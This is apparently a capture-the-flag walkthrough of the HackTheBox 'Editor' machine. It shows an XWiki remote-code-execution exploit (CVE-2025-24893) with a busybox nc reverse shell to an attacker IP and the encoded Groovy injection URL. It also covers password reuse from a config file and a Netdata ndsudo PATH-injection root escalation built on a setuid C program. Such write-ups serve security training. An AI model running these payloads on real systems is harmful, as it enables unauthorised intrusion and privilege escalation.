Machine Info

Editor is an easy Linux box.

We add editor.htb in /etc/hosts

User

Reconnaissance

We are going to start by running our nmap scan:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

ports=$(nmap -p- --min-rate=1000 -T4 10.129.231.23 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)


└─$ nmap -p$ports -sC -sV 10.129.231.23
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-24 21:26 CET
Nmap scan report for editor.htb (10.129.231.23)
Host is up (0.054s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Editor - SimplistCode Pro
8080/tcp open  http    Jetty 10.0.20
| http-title: XWiki - Main - Intro
|_Requested resource was http://editor.htb:8080/xwiki/bin/view/Main/
|_http-server-header: Jetty(10.0.20)
| http-methods: 
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/ 
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/ 
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/ 
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/ 
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/ 
|_/xwiki/bin/undelete/
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
|   Server Type: Jetty(10.0.20)
|_  WebDAV type: Unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.80 seconds

XWIKI CVE

So we started doing some directory enumeration but immediately by browsing the website we see that the interface has a link to wiki.editor.htb. We add the subdomain to our hosts file and continuing we can clearly see that it is the same website between wiki.editor.htb and editor.htb:8080.

Immediately we observe the that this wiki framework has a version.

Looking up online we can find a known RCE CVE-2025-24893. And a public exploit available here. We download it and run it.

1
2
3
4
5
6
7

└─$ python CVE-2025-24893.py -t http://editor.htb:8080 -c 'busybox nc ATTACKER-IP 1234 -e /bin/bash'
[*] Attacking http://editor.htb:8080
[*] Injecting the payload:
http://editor.htb:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%20ATTACKER-IP%201234%20-e%20/bin/bash%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D                                               
[*] Command executed

~Happy Hacking

We have a shell!

1
2
3
4
5

└─$ rlwrap nc -lnvp 1234 
listening on [any] 1234 ...
connect to [10.10.14.91] from (UNKNOWN) [10.129.231.23] 43118
python3 -c 'import pty;pty.spawn("/bin/bash");'
xwiki@editor:/usr/lib/xwiki-jetty$
Tip
Upgrade your shell with python python3 -c 'import pty;pty.spawn("/bin/bash");'!

Secret Re-use

Started looking at the files on the server and and it’s a chaos. We are looking for secrets and passwords we can reuse. We see the user oliver.

Looking at the listening ports we see few interesting ones.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

ss -tlnp
State    Recv-Q    Send-Q            Local Address:Port        Peer Address:Port   Process   
LISTEN   0         4096                  127.0.0.1:36919            0.0.0.0:*                
LISTEN   0         70                    127.0.0.1:33060            0.0.0.0:*                
LISTEN   0         4096                  127.0.0.1:19999            0.0.0.0:*                
LISTEN   0         128                     0.0.0.0:22               0.0.0.0:*                
LISTEN   0         511                     0.0.0.0:80               0.0.0.0:*                
LISTEN   0         4096                  127.0.0.1:8125             0.0.0.0:*                
LISTEN   0         4096              127.0.0.53%lo:53               0.0.0.0:*                
LISTEN   0         151                   127.0.0.1:3306             0.0.0.0:*                
LISTEN   0         50                            *:8080                   *:*                
LISTEN   0         128                        [::]:22                  [::]:*                
LISTEN   0         511                        [::]:80                  [::]:*                
LISTEN   0         50           [::ffff:127.0.0.1]:8079                   *:*

There is a mysql service running and we see also two other interesting ports, 19999 and 8125. Looking it up online it seems that 19999 is for a monitoring service named Netdata.

We run few interesting search commands to find a password based on MySQL first.

1
2
3
4

xwiki@editor:/usr/lib/xwiki-jetty$ grep -R "jdbc:mysql" ./ 
grep -R "jdbc:mysql" ./ 
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false&amp;connectionTimeZone=LOCAL&amp;allowPublicKeyRetrieval=true</property>
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false</property>

Looking at the file hibernate.cfg.xml we spot that it configures credentials for different types of databases. For mysql it default creds that don’t work after checking.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

<!-- MySQL configuration.
         Uncomment if you want to use MySQL and comment out other database configurations.
         Notes:
           - if you want the main wiki database to be different than "xwiki"
             you will also have to set the property xwiki.db in xwiki.cfg file
           - if you're using a MySQL 8+ JDBC driver, you don't need the "hibernate.connection.driver_class" which will
             generate a warning since it's not needed as the driver is registered automatically

    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false</property>
    <property name="hibernate.connection.username">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property>
    <property name="hibernate.dbcp.poolPreparedStatements">true</property>
    <property name="hibernate.dbcp.maxOpenPreparedStatements">20</property>

    <property name="hibernate.connection.charSet">UTF-8</property>
    <property name="hibernate.connection.useUnicode">true</property>
    <property name="hibernate.connection.characterEncoding">utf8</property>

    <mapping resource="xwiki.hbm.xml"/>
    <mapping resource="feeds.hbm.xml"/>
    <mapping resource="instance.hbm.xml"/>
    <mapping resource="notification-filter-preferences.hbm.xml"/>
    <mapping resource="mailsender.hbm.xml"/>

We spot though that there may be other files that actually have the creds set for the production environment and we see that the field specifying the password was hibernate.connection.password. So we search based on that.

User pass
1
2
3
4
5
6
7
8
9

xwiki@editor:/usr/lib/xwiki-jetty$ grep -R "hibernate.connection.password" ./
grep -R "hibernate.connection.password" ./
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.password">theEd1t0rTeam99</property>
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.password">xwiki</property>
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.password">xwiki</property>
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.password"></property>
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.password">xwiki</property>
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.password">xwiki</property>
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.password"></property>

We get the password which was actually on the same file few lines above… This is the user password.

Root

Netdata

We have seen before an interesting service running but first we are going to run linpeas and see all possible attack vectors.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

...
User & Groups: uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)
Hostname: editor
...

╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid                                                                                           
-rwsr-x--- 1 root netdata 943K Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network (Unknown SUID binary!)                                                              
-rwsr-x--- 1 root netdata 1.4M Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin (Unknown SUID binary!)                                                       
-rwsr-x--- 1 root netdata 1.1M Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/local-listeners (Unknown SUID binary!)                                                             
-rwsr-x--- 1 root netdata 196K Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (Unknown SUID binary!)                                                                      
-rwsr-x--- 1 root netdata 80K Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ioping (Unknown SUID binary!)                                                                       
-rwsr-x--- 1 root netdata 876K Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin (Unknown SUID binary!)                                                               
-rwsr-x--- 1 root netdata 4.1M Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin (Unknown SUID binary!

This is interesting. It seems we have more than the usual SUID binaries and all tied to netdata app. Let’s forward the port and check it ourselves.

1

└─$ ssh [email protected]  -L 127.0.0.1:19999:127.0.0.1:19999

We see the problem right away. Looking up online we find CVE-2024-32019.

Path Injection - CVE-2024-32019

In order to exploit this we need to put a module of the ndsudo command in our PATH and make it malicious so it gives us a root shell or whatever we want to achieve.

1
2

mkdir /home/oliver/topath
export PATH="/home/oliver/topath:$PATH"

Now if we place bash as nvme on that folder it will run with SUID privileges.

1
2
3

oliver@editor:~/topath$ cp /bin/bash ./nvme
oliver@editor:~/topath$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list 
/home/oliver/topath/nvme: list: No such file or directory

The problem here is that the command appends a list argument and bash get’s confused. We tried other quick wins but failed.

1
2
3

oliver@editor:~/topath$ echo "/bin/bash" > nvme 
oliver@editor:~/topath$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list 
execve: Exec format error

So we had to compile a C binary that runs bash correctly for to get the flag or get rev shell. On our attacker machine we make the executable.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

└─$ cat exp.c 
#include<unistd.h>
#include <stdlib.h>
void main() {
    setuid(0);
    setgid(0);
    system("cat /root/root.txt");
}


└─$ gcc exp.c -o exp

Uploading that as nvme on the ./topath folder and running the command gives us the root flag!